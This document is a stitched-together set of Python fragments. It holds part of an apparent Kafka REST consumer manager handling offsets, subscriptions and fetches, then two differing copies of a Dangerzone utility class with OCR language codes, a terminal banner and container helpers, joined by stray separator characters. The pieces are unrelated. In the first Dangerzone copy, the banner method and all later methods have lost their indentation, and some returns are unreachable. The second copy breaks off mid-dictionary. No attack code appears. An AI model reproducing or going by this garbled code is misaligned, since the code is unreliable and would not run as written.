        self, internal_name: Tuple[str, str], content_type: str, request_data: dict, cluster_metadata: dict
    ):
        """Commit the given offsets, or the current positions when none are given."""
        self.log.info("Committing offsets for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        if request_data:
            self._assert_has_key(request_data, "offsets", content_type)
        payload = {}
        for el in request_data.get("offsets", []):
            for k in ["partition", "offset"]:
                convert_to_int(el, k, content_type)
            # If we commit for a partition that does not belong to this consumer, then the internal error raised
            # is marked as retriable, and thus the commit method will remain blocked in what looks like an infinite loop
            self._topic_and_partition_valid(cluster_metadata, el, content_type)
            # Kafka stores the offset of the *next* record to consume, hence +1.
            payload[TopicPartition(el["topic"], el["partition"])] = OffsetAndMetadata(el["offset"] + 1, None)
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            # An empty payload means "commit current positions of all assigned partitions".
            payload = payload or None
            try:
                consumer.commit(offsets=payload)
            except KafkaError as e:
                KarapaceBase.internal_error(message=f"error sending commit request: {e}", content_type=content_type)
        empty_response()

    async def get_offsets(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
        """Return the committed offsets for the requested partitions."""
        self.log.info("Retrieving offsets for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        self._assert_has_key(request_data, "partitions", content_type)
        response = {"offsets": []}
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            for el in request_data["partitions"]:
                convert_to_int(el, "partition", content_type)
                tp = TopicPartition(el["topic"], el["partition"])
                commit_info = consumer.committed(tp, metadata=True)
                # Partitions with no committed offset are simply omitted.
                if not commit_info:
                    continue
                response["offsets"].append(
                    {
                        "topic": tp.topic,
                        "partition": tp.partition,
                        "metadata": commit_info.metadata,
                        "offset": commit_info.offset,
                    }
                )
        KarapaceBase.r(body=response, content_type=content_type)
    # SUBSCRIPTION
    async def set_subscription(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
        """Subscribe the consumer to a topic list and/or a regex pattern."""
        self.log.info("Updating subscription for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        topics = request_data.get("topics", [])
        topics_pattern = request_data.get("topic_pattern")
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            try:
                consumer.subscribe(topics=topics, pattern=topics_pattern)
                # Force a group rejoin so the new subscription takes effect now.
                self._update_partition_assignments(consumer)
                empty_response()
            except AssertionError:
                # kafka-python asserts when neither topics nor a pattern is given
                self._illegal_state_fail(
                    message="Neither topic_pattern nor topics are present in request", content_type=content_type
                )
            except IllegalStateError as e:
                self._illegal_state_fail(str(e), content_type=content_type)
            finally:
                self.log.info("Done updating subscription")

    async def get_subscription(self, internal_name: Tuple[str, str], content_type: str):
        """Return the consumer's currently subscribed topics (empty list when none)."""
        self.log.info("Retrieving subscription for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            if consumer.subscription() is None:
                topics = []
            else:
                topics = list(consumer.subscription())
            KarapaceBase.r(content_type=content_type, body={"topics": topics})

    async def delete_subscription(self, internal_name: Tuple[str, str], content_type: str):
        """Unsubscribe the consumer from everything; responds with an empty body."""
        self.log.info("Deleting subscription for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        async with self.consumer_locks[internal_name]:
            self.consumers[internal_name].consumer.unsubscribe()
        empty_response()
    # ASSIGNMENTS
    async def set_assignments(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
        """Manually assign the given topic/partitions to the consumer."""
        self.log.info("Updating assignments for %s to %r", internal_name, request_data)
        self._assert_consumer_exists(internal_name, content_type)
        self._assert_has_key(request_data, "partitions", content_type)
        partitions = []
        for el in request_data["partitions"]:
            convert_to_int(el, "partition", content_type)
            self._has_topic_and_partition_keys(el, content_type)
            partitions.append(TopicPartition(el["topic"], el["partition"]))
        async with self.consumer_locks[internal_name]:
            try:
                consumer = self.consumers[internal_name].consumer
                consumer.assign(partitions)
                # Resolve fetch positions for the new manual assignment.
                self._update_partition_assignments(consumer)
                empty_response()
            except IllegalStateError as e:
                # e.g. assign() after subscribe() is an illegal state in kafka-python
                self._illegal_state_fail(message=str(e), content_type=content_type)
            finally:
                self.log.info("Done updating assignment")

    async def get_assignments(self, internal_name: Tuple[str, str], content_type: str):
        """Return the topic/partitions currently assigned to the consumer."""
        self.log.info("Retrieving assignment for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            KarapaceBase.r(
                content_type=content_type,
                body={"partitions": [{"topic": pd.topic, "partition": pd.partition} for pd in consumer.assignment()]},
            )
    # POSITIONS
    async def seek_to(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
        """Seek the consumer to explicit offsets for the given partitions."""
        self.log.info("Resetting offsets for %s to %r", internal_name, request_data)
        self._assert_consumer_exists(internal_name, content_type)
        self._assert_has_key(request_data, "offsets", content_type)
        seeks = []
        # Validate the whole request before touching the consumer.
        for el in request_data["offsets"]:
            self._assert_has_key(el, "topic", content_type)
            for k in ["offset", "partition"]:
                self._assert_has_key(el, k, content_type)
                convert_to_int(el, k, content_type)
            self._assert_positive_number(el, "offset", content_type)
            seeks.append((TopicPartition(topic=el["topic"], partition=el["partition"]), el["offset"]))
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            for part, offset in seeks:
                try:
                    consumer.seek(part, offset)
                except AssertionError:
                    # kafka-python asserts when seeking a partition that is not assigned
                    self._illegal_state_fail(f"Partition {part} is unassigned", content_type)
            empty_response()

    async def seek_limit(
        self, internal_name: Tuple[str, str], content_type: str, request_data: dict, beginning: bool = True
    ):
        """Seek the given partitions to the beginning (default) or the end."""
        direction = "beginning" if beginning else "end"
        self.log.info("Seeking %s offsets", direction)
        self._assert_consumer_exists(internal_name, content_type)
        self._assert_has_key(request_data, "partitions", content_type)
        resets = []
        for el in request_data["partitions"]:
            convert_to_int(el, "partition", content_type)
            for k in ["topic", "partition"]:
                self._assert_has_key(el, k, content_type)
            resets.append(TopicPartition(topic=el["topic"], partition=el["partition"]))
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            try:
                if beginning:
                    consumer.seek_to_beginning(*resets)
                else:
                    consumer.seek_to_end(*resets)
                empty_response()
            except AssertionError:
                self._illegal_state_fail(f"Trying to reset unassigned partitions to {direction}", content_type)
    async def fetch(self, internal_name: Tuple[str, str], content_type: str, formats: dict, query_params: dict):
        """Fetch records for a consumer and respond with the decoded messages.

        Polls repeatedly (one record per poll) until either ``max_bytes`` worth
        of records have been read or the request's time budget is exhausted,
        then deserializes keys/values according to the consumer's embedded
        format.
        """
        self.log.info("Running fetch for name %s with parameters %r and formats %r", internal_name, query_params, formats)
        self._assert_consumer_exists(internal_name, content_type)
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            serialization_format = self.consumers[internal_name].serialization_format
            config = self.consumers[internal_name].config
            request_format = formats["embedded_format"]
            # 406 when the requested embedded format differs from the one the
            # consumer was created with.
            self._assert(
                cond=serialization_format == request_format,
                code=HTTPStatus.NOT_ACCEPTABLE,
                sub_code=RESTErrorCodes.UNSUPPORTED_FORMAT.value,
                content_type=content_type,
                message=f"Consumer format {serialization_format} does not match the embedded format {request_format}",
            )
            self.log.info("Fetch request for %s with params %r", internal_name, query_params)
            try:
                # Query parameters override the consumer's configured defaults.
                timeout = (
                    int(query_params["timeout"]) if "timeout" in query_params else config["consumer.request.timeout.ms"]
                )
                # we get to be more in line with the confluent proxy by doing a bunch of fetches each time and
                # respecting the max fetch request size
                max_bytes = (
                    int(query_params["max_bytes"]) if "max_bytes" in query_params else consumer.config["fetch_max_bytes"]
                )
            except ValueError:
                # internal_error is assumed not to return, so timeout/max_bytes
                # are always bound below -- TODO confirm it raises.
                KarapaceBase.internal_error(message=f"Invalid request parameters: {query_params}", content_type=content_type)
            for val in [timeout, max_bytes]:
                if not val:
                    continue
                if val <= 0:
                    KarapaceBase.internal_error(message=f"Invalid request parameter {val}", content_type=content_type)
            response = []
            self.log.info(
                "Will poll multiple times for a single message with a total timeout of %dms, "
                "until at least %d bytes have been fetched",
                timeout,
                max_bytes,
            )
            read_bytes = 0
            start_time = time.monotonic()
            poll_data = defaultdict(list)
            message_count = 0
            # `timeout` is milliseconds, monotonic() is seconds, hence /1000.
            while read_bytes < max_bytes and start_time + timeout / 1000 > time.monotonic():
                time_left = start_time + timeout / 1000 - time.monotonic()
                bytes_left = max_bytes - read_bytes
                self.log.info(
                    "Polling with %r time left and %d bytes left, gathered %d messages so far",
                    time_left,
                    bytes_left,
                    message_count,
                )
                # NOTE(review): each poll() is given the *full* timeout rather
                # than the remaining time_left -- confirm this is intended.
                data = consumer.poll(timeout_ms=timeout, max_records=1)
                self.log.debug("Successfully polled for messages")
                for topic, records in data.items():
                    for rec in records:
                        message_count += 1
                        # serialized_*_size is -1 when the field is absent; clamp to 0.
                        read_bytes += (
                            max(0, rec.serialized_key_size)
                            + max(0, rec.serialized_value_size)
                            + max(0, rec.serialized_header_size)
                        )
                        poll_data[topic].append(rec)
            self.log.info("Gathered %d total messages", message_count)
            # Decode everything we gathered and build the response body.
            for tp in poll_data:
                for msg in poll_data[tp]:
                    try:
                        key = await self.deserialize(msg.key, request_format) if msg.key else None
                        value = await self.deserialize(msg.value, request_format) if msg.value else None
                    except (UnpackError, InvalidMessageHeader, InvalidPayload) as e:
                        KarapaceBase.internal_error(message=f"deserialization error: {e}", content_type=content_type)
                    element = {
                        "topic": tp.topic,
                        "partition": tp.partition,
                        "offset": msg.offset,
                        "key": key,
                        "value": value,
                    }
                    response.append(element)
            KarapaceBase.r(content_type=content_type, body=response)
    async def deserialize(self, bytes_: bytes, fmt: str):
        """Decode *bytes_* per *fmt*: None for empty payloads, the registry
        deserializer for schema formats, parsed JSON for "json", otherwise
        base64 text (the "binary" format)."""
        if not bytes_:
            return None
        if fmt in {"avro", "jsonschema", "protobuf"}:
            return await self.deserializer.deserialize(bytes_)
        if fmt == "json":
            return ujson.loads(bytes_.decode("utf-8"))
        return base64.b64encode(bytes_).decode("utf-8")

    def close(self):
        """Close every registered consumer, ignoring individual failures (shutdown path)."""
        for k in list(self.consumers.keys()):
            c = self.consumers.pop(k)
            try:
                c.consumer.close()
            except:  # pylint: disable=bare-except
                pass
|
import inspect
import os
import pipes
import platform
import shlex
import subprocess
import sys

import appdirs
import colorama
from colorama import Fore, Back, Style

from .settings import Settings
class GlobalCommon(object):
    """
    The GlobalCommon class is a singleton of shared functionality throughout the app
    """

    def __init__(self):
        """Load the version, init terminal colors, and build the tesseract language map."""
        # Version
        try:
            with open(self.get_resource_path("version.txt")) as f:
                self.version = f.read().strip()
        except FileNotFoundError:
            # In dev mode, in Windows, get_resource_path doesn't work properly for dangerzone-container, but luckily
            # it doesn't need to know the version
            self.version = "unknown"
        # Initialize terminal colors
        colorama.init(autoreset=True)
        # App data folder
        self.appdata_path = appdirs.user_config_dir("dangerzone")
        # In case we have a custom container
        self.custom_container = None
        # dangerzone-container path
        self.dz_container_path = self.get_dangerzone_container_path()
        # Languages supported by tesseract
        # (display name -> tesseract traineddata code)
        self.ocr_languages = {
            # Bug fix: was "ar", which is not a tesseract code at all
            # (Arabic is "ara"); Afrikaans traineddata is "afr".
            "Afrikaans": "afr",
            "Albanian": "sqi",
            "Amharic": "amh",
            "Arabic": "ara",
            "Arabic script": "Arabic",
            "Armenian": "hye",
            "Armenian script": "Armenian",
            "Assamese": "asm",
            "Azerbaijani": "aze",
            "Azerbaijani (Cyrillic)": "aze_cyrl",
            "Basque": "eus",
            "Belarusian": "bel",
            "Bengali": "ben",
            "Bengali script": "Bengali",
            "Bosnian": "bos",
            "Breton": "bre",
            "Bulgarian": "bul",
            "Burmese": "mya",
            "Canadian Aboriginal script": "Canadian_Aboriginal",
            "Catalan": "cat",
            "Cebuano": "ceb",
            "Cherokee": "chr",
            "Cherokee script": "Cherokee",
            "Chinese - Simplified": "chi_sim",
            "Chinese - Simplified (vertical)": "chi_sim_vert",
            "Chinese - Traditional": "chi_tra",
            "Chinese - Traditional (vertical)": "chi_tra_vert",
            "Corsican": "cos",
            "Croatian": "hrv",
            "Cyrillic script": "Cyrillic",
            "Czech": "ces",
            "Danish": "dan",
            "Devanagari script": "Devanagari",
            "Divehi": "div",
            "Dutch": "nld",
            "Dzongkha": "dzo",
            "English": "eng",
            "English, Middle (1100-1500)": "enm",
            "Esperanto": "epo",
            "Estonian": "est",
            "Ethiopic script": "Ethiopic",
            "Faroese": "fao",
            "Filipino": "fil",
            "Finnish": "fin",
            "Fraktur script": "Fraktur",
            "Frankish": "frk",
            "French": "fra",
            "French, Middle (ca.1400-1600)": "frm",
            "Frisian (Western)": "fry",
            "Gaelic (Scots)": "gla",
            "Galician": "glg",
            "Georgian": "kat",
            "Georgian script": "Georgian",
            "German": "deu",
            "Greek": "ell",
            "Greek script": "Greek",
            "Gujarati": "guj",
            "Gujarati script": "Gujarati",
            "Gurmukhi script": "Gurmukhi",
            "Hangul script": "Hangul",
            "Hangul (vertical) script": "Hangul_vert",
            "Han - Simplified script": "HanS",
            "Han - Simplified (vertical) script": "HanS_vert",
            "Han - Traditional script": "HanT",
            "Han - Traditional (vertical) script": "HanT_vert",
            # NOTE(review): "Hatian" is a misspelling of "Haitian"; left
            # unchanged since the key is a user-visible/stored value.
            "Hatian": "hat",
            "Hebrew": "heb",
            "Hebrew script": "Hebrew",
            "Hindi": "hin",
            "Hungarian": "hun",
            "Icelandic": "isl",
            "Indonesian": "ind",
            "Inuktitut": "iku",
            "Irish": "gle",
            "Italian": "ita",
            "Italian - Old": "ita_old",
            "Japanese": "jpn",
            "Japanese script": "Japanese",
            "Japanese (vertical)": "jpn_vert",
            "Japanese (vertical) script": "Japanese_vert",
            "Javanese": "jav",
            "Kannada": "kan",
            "Kannada script": "Kannada",
            "Kazakh": "kaz",
            "Khmer": "khm",
            "Khmer script": "Khmer",
            "Korean": "kor",
            "Korean (vertical)": "kor_vert",
            "Kurdish (Arabic)": "kur_ara",
            "Kyrgyz": "kir",
            "Lao": "lao",
            "Lao script": "Lao",
            "Latin": "lat",
            "Latin script": "Latin",
            "Latvian": "lav",
            "Lithuanian": "lit",
            "Luxembourgish": "ltz",
            "Macedonian": "mkd",
            "Malayalam": "mal",
            "Malayalam script": "Malayalam",
            "Malay": "msa",
            "Maltese": "mlt",
            "Maori": "mri",
            "Marathi": "mar",
            "Mongolian": "mon",
            "Myanmar script": "Myanmar",
            "Nepali": "nep",
            "Norwegian": "nor",
            "Occitan (post 1500)": "oci",
            "Old Georgian": "kat_old",
            "Oriya (Odia) script": "Oriya",
            "Oriya": "ori",
            "Pashto": "pus",
            "Persian": "fas",
            "Polish": "pol",
            "Portuguese": "por",
            "Punjabi": "pan",
            "Quechua": "que",
            "Romanian": "ron",
            "Russian": "rus",
            "Sanskrit": "san",
            "script and orientation": "osd",
            "Serbian (Latin)": "srp_latn",
            "Serbian": "srp",
            "Sindhi": "snd",
            "Sinhala script": "Sinhala",
            "Sinhala": "sin",
            "Slovakian": "slk",
            "Slovenian": "slv",
            "Spanish, Castilian - Old": "spa_old",
            "Spanish": "spa",
            "Sundanese": "sun",
            "Swahili": "swa",
            "Swedish": "swe",
            "Syriac script": "Syriac",
            "Syriac": "syr",
            "Tajik": "tgk",
            "Tamil script": "Tamil",
            "Tamil": "tam",
            "Tatar": "tat",
            "Telugu script": "Telugu",
            "Telugu": "tel",
            "Thaana script": "Thaana",
            "Thai script": "Thai",
            "Thai": "tha",
            "Tibetan script": "Tibetan",
            "Tibetan Standard": "bod",
            "Tigrinya": "tir",
            "Tonga": "ton",
            "Turkish": "tur",
            "Ukrainian": "ukr",
            "Urdu": "urd",
            "Uyghur": "uig",
            "Uzbek (Cyrillic)": "uzb_cyrl",
            "Uzbek": "uzb",
            "Vietnamese script": "Vietnamese",
            "Vietnamese": "vie",
            "Welsh": "cym",
            "Yiddish": "yid",
            "Yoruba": "yor",
        }
        # Load settings
        self.settings = Settings(self)
def display_banner(self):
"""
Raw ASCII art example:
╭──────────────────────────╮
│ ▄██▄ │
│ ██████ │
│ ███▀▀▀██ │
│ ███ ████ │
│ ███ ██████ │
│ ███ ▀▀▀▀████ │
│ ███████ ▄██████ │
│ ███████ ▄█████████ │
│ ████████████████████ │
│ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ │
│ │
│ Dangerzone v0.1.5 │
│ https://dangerzone.rocks │
╰──────────────────────────╯
"""
print(Back.BLACK + Fore.YELLOW + Style.DIM + "╭──────────────────────────╮")
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ▄██▄ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ██████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███▀▀▀██ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███ ████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███ ██████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███ ▀▀▀▀████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███████ ▄██████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███████ ▄█████████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ████████████████████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(Back.BLACK + Fore.YELLOW + Style.DIM + "│ │")
left_spaces = (15 - len(self.version) - 1) // 2
right_spaces = left_spaces
if left_spaces + len(self.version) + 1 + right_spaces < 15:
right_spaces += 1
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Style.RESET_ALL
+ Back.BLACK
+ Fore.LIGHTWHITE_EX
+ Style.BRIGHT
+ f"{" "*left_spaces}Dangerzone v{self.version}{" "*right_spaces}"
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Style.RESET_ALL
+ Back.BLACK
+ Fore.LIGHTWHITE_EX
+ " https://dangerzone.rocks "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(Back.BLACK + Fore.YELLOW + Style.DIM + "╰──────────────────────────╯")
def get_container_name(self):
if self.custom_container:
return self.custom_container
else:
return "docker.io/flmcode/dangerzone"
    def get_resource_path(self, filename):
        """Return the absolute path of a bundled resource file.

        In dev mode (``sys.dangerzone_dev`` is set) resources live in
        ``../share`` relative to this module; in packaged builds the prefix
        depends on the platform.
        """
        if getattr(sys, "dangerzone_dev", False):
            # Look for resources directory relative to python file
            prefix = os.path.join(
                os.path.dirname(
                    os.path.dirname(
                        os.path.abspath(inspect.getfile(inspect.currentframe()))
                    )
                ),
                "share",
            )
        else:
            if platform.system() == "Darwin":
                # macOS app bundle: Contents/Resources/share next to the executable dir
                prefix = os.path.join(
                    os.path.dirname(os.path.dirname(sys.executable)), "Resources/share"
                )
            elif platform.system() == "Linux":
                prefix = os.path.join(sys.prefix, "share", "dangerzone")
            else:
                # Windows
                prefix = os.path.join(os.path.dirname(sys.executable), "share")
        resource_path = os.path.join(prefix, filename)
        return resource_path
    def get_dangerzone_container_path(self):
        """Return the path of the dangerzone-container helper executable.

        Dev mode uses the script in ``dev_scripts``; packaged builds use a
        platform-specific location.
        """
        if getattr(sys, "dangerzone_dev", False):
            # Look for resources directory relative to python file
            path = os.path.join(
                os.path.dirname(
                    os.path.dirname(
                        os.path.abspath(inspect.getfile(inspect.currentframe()))
                    )
                ),
                "dev_scripts",
                "dangerzone-container",
            )
            if platform.system() == "Windows":
                # The dev helper is a .bat wrapper on Windows
                path = f"{path}.bat"
            return path
        else:
            if platform.system() == "Darwin":
                return os.path.join(
                    os.path.dirname(sys.executable), "dangerzone-container"
                )
            elif platform.system() == "Windows":
                return os.path.join(
                    os.path.dirname(sys.executable), "dangerzone-container.exe"
                )
            else:
                return "/usr/bin/dangerzone-container"
def exec_dangerzone_container(self, args):
args = [self.dz_container_path] + args
args_str = " ".join(pipes.quote(s) for s in args)
print(Style.DIM + "> " + Style.NORMAL + Fore.CYAN + args_str)
# Execute dangerzone-container
return subprocess.Popen(
args,
startupinfo=self.get_subprocess_startupinfo(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
def get_subprocess_startupinfo(self):
if platform.system() == "Windows":
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
return startupinfo
else:
return None
def container_exists(self, container_name):
"""
Check if container_name is a valid container. Returns a tuple like:
(success (boolean), error_message (str))
"""
# Do we have this container?
with self.exec_dangerzone_container(
["ls", "--container-name", container_name]
) as p:
stdout_data, _ = p.communicate()
lines = stdout_data.split(b"\n")
if b"> " in lines[0]:
stdout_data = b"\n".join(lines[1:])
# The user canceled, or permission denied
if p.returncode == 126 or p.returncode == 127:
return False, "Authorization failed"
return
elif p.returncode != 0:
return False, "Container error"
return
# Check the output
if container_name.encode() not in stdout_data:
return False, f"Container '{container_name}' not found"
return True, True
def validate_convert_to_pixel_output(self, common, output):
"""
Take the output from the convert to pixels tasks and validate it. Returns
a tuple like: (success (boolean), error_message (str))
"""
max_image_width = 10000
max_image_height = 10000
# Did we hit an error?
for line in output.split("\n"):
if (
"failed:" in line
or "The document format is not supported" in line
or "Error" in line
):
return False, output
# How many pages was that?
num_pages = None
for line in output.split("\n"):
if line.startswith("Document has "):
num_pages = line.split(" ")[2]
break
if not num_pages or not num_pages.isdigit() or int(num_pages) <= 0:
return False, "Invalid number of pages returned"
num_pages = int(num_pages)
# Make sure we have the files we expect
expected_filenames = []
for i in range(1, num_pages + 1):
expected_filenames += [
f"page-{i}.rgb",
f"page-{i}.width",
f"page-{i}.height",
]
expected_filenames.sort()
actual_filenames = os.listdir(common.pixel_dir.name)
actual_filenames.sort()
if expected_filenames != actual_filenames:
return (
False,
f"We expected these files:\n{expected_filenames}\n\nBut we got these files:\n{actual_filenames}",
)
# Make sure the files are the correct sizes
for i in range(1, num_pages + 1):
with open(f"{common.pixel_dir.name}/page-{i}.width") as f:
w_str = f.read().strip()
with open(f"{common.pixel_dir.name}/page-{i}.height") as f:
h_str = f.read().strip()
w = int(w_str)
h = int(h_str)
if (
not w_str.isdigit()
or not h_str.isdigit()
or w <= 0
or w > max_image_width
or h <= 0
or h > max_image_height
):
return False, f"Page {i} has invalid geometry"
# Make sure the RGB file is the correct size
if os.path.getsize(f"{common.pixel_dir.name}/page-{i}.rgb") != w * h * 3:
return False, f"Page {i} has an invalid RGB file size"
return True, True
| import sys
import os
import inspect
import appdirs
import platform
import subprocess
import pipes
import colorama
from colorama import Fore, Back, Style
from .settings import Settings
class GlobalCommon(object):
    """
    The GlobalCommon class is a singleton of shared functionality throughout the app
    """

    # The ten rows of ASCII art drawn between the frame bars by
    # display_banner(); kept here so the method can loop instead of
    # repeating one print-statement per row.
    BANNER_ART = [
        " ▄██▄ ",
        " ██████ ",
        " ███▀▀▀██ ",
        " ███ ████ ",
        " ███ ██████ ",
        " ███ ▀▀▀▀████ ",
        " ███████ ▄██████ ",
        " ███████ ▄█████████ ",
        " ████████████████████ ",
        " ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ",
    ]

    def __init__(self):
        # Version, read from the bundled version.txt resource
        try:
            with open(self.get_resource_path("version.txt")) as f:
                self.version = f.read().strip()
        except FileNotFoundError:
            # In dev mode, in Windows, get_resource_path doesn't work properly
            # for dangerzone-container, but luckily it doesn't need to know
            # the version
            self.version = "unknown"
        # Initialize terminal colors
        colorama.init(autoreset=True)
        # App data folder
        self.appdata_path = appdirs.user_config_dir("dangerzone")
        # In case we have a custom container
        self.custom_container = None
        # dangerzone-container path
        self.dz_container_path = self.get_dangerzone_container_path()
        # Languages supported by tesseract: display name -> traineddata code
        self.ocr_languages = {
            # Fixed: was "ar", which is not a tesseract traineddata code
            # (Arabic is "ara"; Afrikaans is "afr").
            "Afrikaans": "afr",
            "Albanian": "sqi",
            "Amharic": "amh",
            "Arabic": "ara",
            "Arabic script": "Arabic",
            "Armenian": "hye",
            "Armenian script": "Armenian",
            "Assamese": "asm",
            "Azerbaijani": "aze",
            "Azerbaijani (Cyrillic)": "aze_cyrl",
            "Basque": "eus",
            "Belarusian": "bel",
            "Bengali": "ben",
            "Bengali script": "Bengali",
            "Bosnian": "bos",
            "Breton": "bre",
            "Bulgarian": "bul",
            "Burmese": "mya",
            "Canadian Aboriginal script": "Canadian_Aboriginal",
            "Catalan": "cat",
            "Cebuano": "ceb",
            "Cherokee": "chr",
            "Cherokee script": "Cherokee",
            "Chinese - Simplified": "chi_sim",
            "Chinese - Simplified (vertical)": "chi_sim_vert",
            "Chinese - Traditional": "chi_tra",
            "Chinese - Traditional (vertical)": "chi_tra_vert",
            "Corsican": "cos",
            "Croatian": "hrv",
            "Cyrillic script": "Cyrillic",
            "Czech": "ces",
            "Danish": "dan",
            "Devanagari script": "Devanagari",
            "Divehi": "div",
            "Dutch": "nld",
            "Dzongkha": "dzo",
            "English": "eng",
            "English, Middle (1100-1500)": "enm",
            "Esperanto": "epo",
            "Estonian": "est",
            "Ethiopic script": "Ethiopic",
            "Faroese": "fao",
            "Filipino": "fil",
            "Finnish": "fin",
            "Fraktur script": "Fraktur",
            "Frankish": "frk",
            "French": "fra",
            "French, Middle (ca.1400-1600)": "frm",
            "Frisian (Western)": "fry",
            "Gaelic (Scots)": "gla",
            "Galician": "glg",
            "Georgian": "kat",
            "Georgian script": "Georgian",
            "German": "deu",
            "Greek": "ell",
            "Greek script": "Greek",
            "Gujarati": "guj",
            "Gujarati script": "Gujarati",
            "Gurmukhi script": "Gurmukhi",
            "Hangul script": "Hangul",
            "Hangul (vertical) script": "Hangul_vert",
            "Han - Simplified script": "HanS",
            "Han - Simplified (vertical) script": "HanS_vert",
            "Han - Traditional script": "HanT",
            "Han - Traditional (vertical) script": "HanT_vert",
            "Hatian": "hat",
            "Hebrew": "heb",
            "Hebrew script": "Hebrew",
            "Hindi": "hin",
            "Hungarian": "hun",
            "Icelandic": "isl",
            "Indonesian": "ind",
            "Inuktitut": "iku",
            "Irish": "gle",
            "Italian": "ita",
            "Italian - Old": "ita_old",
            "Japanese": "jpn",
            "Japanese script": "Japanese",
            "Japanese (vertical)": "jpn_vert",
            "Japanese (vertical) script": "Japanese_vert",
            "Javanese": "jav",
            "Kannada": "kan",
            "Kannada script": "Kannada",
            "Kazakh": "kaz",
            "Khmer": "khm",
            "Khmer script": "Khmer",
            "Korean": "kor",
            "Korean (vertical)": "kor_vert",
            "Kurdish (Arabic)": "kur_ara",
            "Kyrgyz": "kir",
            "Lao": "lao",
            "Lao script": "Lao",
            "Latin": "lat",
            "Latin script": "Latin",
            "Latvian": "lav",
            "Lithuanian": "lit",
            "Luxembourgish": "ltz",
            "Macedonian": "mkd",
            "Malayalam": "mal",
            "Malayalam script": "Malayalam",
            "Malay": "msa",
            "Maltese": "mlt",
            "Maori": "mri",
            "Marathi": "mar",
            "Mongolian": "mon",
            "Myanmar script": "Myanmar",
            "Nepali": "nep",
            "Norwegian": "nor",
            "Occitan (post 1500)": "oci",
            "Old Georgian": "kat_old",
            "Oriya (Odia) script": "Oriya",
            "Oriya": "ori",
            "Pashto": "pus",
            "Persian": "fas",
            "Polish": "pol",
            "Portuguese": "por",
            "Punjabi": "pan",
            "Quechua": "que",
            "Romanian": "ron",
            "Russian": "rus",
            "Sanskrit": "san",
            "script and orientation": "osd",
            "Serbian (Latin)": "srp_latn",
            "Serbian": "srp",
            "Sindhi": "snd",
            "Sinhala script": "Sinhala",
            "Sinhala": "sin",
            "Slovakian": "slk",
            "Slovenian": "slv",
            "Spanish, Castilian - Old": "spa_old",
            "Spanish": "spa",
            "Sundanese": "sun",
            "Swahili": "swa",
            "Swedish": "swe",
            "Syriac script": "Syriac",
            "Syriac": "syr",
            "Tajik": "tgk",
            "Tamil script": "Tamil",
            "Tamil": "tam",
            "Tatar": "tat",
            "Telugu script": "Telugu",
            "Telugu": "tel",
            "Thaana script": "Thaana",
            "Thai script": "Thai",
            "Thai": "tha",
            "Tibetan script": "Tibetan",
            "Tibetan Standard": "bod",
